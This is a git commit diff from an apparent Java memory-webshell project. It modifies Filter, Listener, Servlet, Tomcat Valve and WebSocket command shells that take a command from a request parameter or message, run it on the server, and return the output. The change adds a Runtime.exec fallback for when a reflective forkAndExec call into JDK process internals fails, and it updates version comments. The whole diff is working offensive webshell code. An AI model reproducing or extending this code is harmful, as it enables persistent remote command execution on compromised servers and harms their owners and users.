fix: downgrade runtime.exec

ReaJason · ReaJason · commit c675ae9529c0 · 2025-05-10T12:05:02.000+08:00
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilter.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandFilter.java
@@ -33,7 +33,12 @@ public void doFilter(ServletRequest request, ServletResponse response, FilterCha
         String cmd = getParam(servletRequest.getParameter(paramName));
         try {
             if (cmd != null) {
-                InputStream inputStream = forkAndExec(cmd);
+                InputStream inputStream = null;
+                try {
+                    inputStream = forkAndExec(cmd);
+                } catch (Throwable e) {
+                    inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+                }
                 ServletOutputStream outputStream = servletResponse.getOutputStream();
                 byte[] buf = new byte[8192];
                 int length;
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandListener.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandListener.java
@@ -36,7 +36,12 @@ public void requestInitialized(ServletRequestEvent servletRequestEvent) {
             String cmd = getParam(request.getParameter(paramName));
             if (cmd != null) {
                 HttpServletResponse servletResponse = this.getResponseFromRequest(request);
-                InputStream inputStream = forkAndExec(cmd);
+                InputStream inputStream = null;
+                try {
+                    inputStream = forkAndExec(cmd);
+                } catch (Throwable e) {
+                    inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+                }
                 ServletOutputStream outputStream = servletResponse.getOutputStream();
                 byte[] buf = new byte[8192];
                 int length;
@@ -107,7 +112,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             forkMethod.invoke(processObject, mode, helperpathObject, result, argBlock, args.length,
                     null, envc[0], null, std_fds, false);
         } catch (NoSuchFieldException e) {
-            e.printStackTrace();
+            // JDK7
             Method forkMethod = processClass.getDeclaredMethod("forkAndExec", byte[].class, byte[].class, int.class,
                     byte[].class, int.class, byte[].class, int[].class, boolean.class);
             forkMethod.setAccessible(true);
@@ -120,6 +125,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds);
         } catch (NoSuchMethodException e) {
+            // JDK11
             Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class, boolean.class);
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds, false);
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandServlet.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandServlet.java
@@ -33,7 +33,12 @@ protected void doPost(HttpServletRequest request, HttpServletResponse response)
         String cmd = getParam(request.getParameter(paramName));
         try {
             if (cmd != null) {
-                InputStream inputStream = forkAndExec(cmd);
+                InputStream inputStream = null;
+                try {
+                    inputStream = forkAndExec(cmd);
+                } catch (Throwable e) {
+                    inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+                }
                 ServletOutputStream outputStream = response.getOutputStream();
                 byte[] buf = new byte[8192];
                 int length;
@@ -105,7 +110,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             forkMethod.invoke(processObject, mode, helperpathObject, result, argBlock, args.length,
                     null, envc[0], null, std_fds, false);
         } catch (NoSuchFieldException e) {
-            e.printStackTrace();
+            // JDK7
             Method forkMethod = processClass.getDeclaredMethod("forkAndExec", byte[].class, byte[].class, int.class,
                     byte[].class, int.class, byte[].class, int[].class, boolean.class);
             forkMethod.setAccessible(true);
@@ -118,6 +123,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds);
         } catch (NoSuchMethodException e) {
+            // JDK11
             Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class, boolean.class);
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds, false);
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandValve.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandValve.java
@@ -51,7 +51,12 @@ public void invoke(Request request, Response response) throws IOException, Servl
         String cmd = getParam(request.getParameter(paramName));
         try {
             if (cmd != null) {
-                InputStream inputStream = forkAndExec(cmd);
+                InputStream inputStream = null;
+                try {
+                    inputStream = forkAndExec(cmd);
+                } catch (Throwable e) {
+                    inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+                }
                 ServletOutputStream outputStream = response.getOutputStream();
                 byte[] buf = new byte[8192];
                 int length;
@@ -125,7 +130,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             forkMethod.invoke(processObject, mode, helperpathObject, result, argBlock, args.length,
                     null, envc[0], null, std_fds, false);
         } catch (NoSuchFieldException e) {
-            e.printStackTrace();
+            // JDK7
             Method forkMethod = processClass.getDeclaredMethod("forkAndExec", byte[].class, byte[].class, int.class,
                     byte[].class, int.class, byte[].class, int[].class, boolean.class);
             forkMethod.setAccessible(true);
@@ -138,6 +143,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds);
         } catch (NoSuchMethodException e) {
+            // JDK11
             Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class, boolean.class);
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds, false);
diff --git a/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java b/memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/command/CommandWebSocket.java
@@ -27,9 +27,14 @@ private String getParam(String param) {
     }
 
     @Override
-    public void onMessage(String s) {
+    public void onMessage(String cmd) {
         try {
-            InputStream inputStream = forkAndExec(s);
+            InputStream inputStream = null;
+            try {
+                inputStream = forkAndExec(cmd);
+            } catch (Throwable e) {
+                inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+            }
             byte[] buf = new byte[8192];
             int length;
             ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
@@ -91,12 +96,10 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             Object launchMechanismObject = launchMechanismField.get(processObject);
             int mode = 0;
             try {
-                // JDK7 的某些版本
                 Field value = launchMechanismObject.getClass().getDeclaredField("value");
                 value.setAccessible(true);
                 mode = (Integer) value.get(launchMechanismObject);
             } catch (NoSuchFieldException e) {
-                // JDK8+
                 int ordinal = (Integer) launchMechanismObject.getClass().getMethod("ordinal").invoke(launchMechanismObject);
                 mode = ordinal + 1;
             }
@@ -107,8 +110,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             forkMethod.invoke(processObject, mode, helperpathObject, result, argBlock, args.length,
                     null, envc[0], null, std_fds, false);
         } catch (NoSuchFieldException e) {
-            e.printStackTrace();
-            // JDK6 与 JDK7 低版本
+            // JDK7
             Method forkMethod = processClass.getDeclaredMethod("forkAndExec", byte[].class, byte[].class, int.class,
                     byte[].class, int.class, byte[].class, int[].class, boolean.class);
             forkMethod.setAccessible(true);
@@ -121,6 +123,7 @@ public static InputStream forkAndExec(String cmd) throws Exception {
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds);
         } catch (NoSuchMethodException e) {
+            // JDK11
             Method initStreamsMethod = processClass.getDeclaredMethod("initStreams", int[].class, boolean.class);
             initStreamsMethod.setAccessible(true);
             initStreamsMethod.invoke(processObject, std_fds, false);
